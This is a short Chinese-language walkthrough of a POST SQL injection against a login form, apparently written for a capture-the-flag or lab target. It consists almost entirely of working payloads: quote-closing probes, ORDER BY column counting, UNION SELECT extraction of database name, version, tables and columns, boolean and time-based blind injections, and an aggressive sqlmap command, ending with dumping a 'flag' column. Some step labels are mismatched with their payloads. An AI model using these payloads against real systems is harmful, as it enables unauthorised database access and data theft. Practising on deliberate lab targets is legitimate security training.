POST注入流程

1.判断是否存在注入

uname='&passwd=a&submit=Submit

错误回显 => 存在注入

2.判断参数类型

uname=1 or 1=1 #&passwd=a&submit=Submit

正确回显 => 字符型

3.进行参数闭合

uname=1" or 1=1 #&passwd=a&submit=Submit

错误回显

uname=1") or 1=1#&passwd=a&submit=Submit

登录回显 => 闭合成功

4.查看这个网站后台数据库所在的表有几列

uname=' or 1=1 order by 2#&passwd=a&submit=Submit

正确回显

uname=' or 1=1 order by 3#&passwd=a&submit=Submit

错误回显 => 有2列

5.进行 union select联合查询，发现输出位

uname='union select 1,2#&passwd=a&submit=Submit

5.1没有回显信息，使用报错注入查询数据库

uname=1' or left(database(),1)>'a'  #&passwd=a&submit=Submit

5.1没有回显信息，使用布尔盲注查询数据库

uname=1") or if(length(database())=7,1,sleep(5)) #&passwd=a&submit=Submit

 5.2使用sqlmap注入

python sqlmap.py -r burp.txt --batch --leve=5 --risk=3 --threads=20 --technique=T --time-sec=2

6.查看所在数据库和数据库版本

uname='union select database(),version()#&passwd=a&submit=Submit

7.查看数据库的表

uname='union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #&passwd=a&submit=Submit

8.查看DPXE2rot表中的列

uname='union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="DPXE2rot" #&passwd=a&submit=Submit

9.查看表中的flag列中的数据

uname='union select 1,flag from DPXE2rot limit 3,1 #&passwd=a&submit=Submit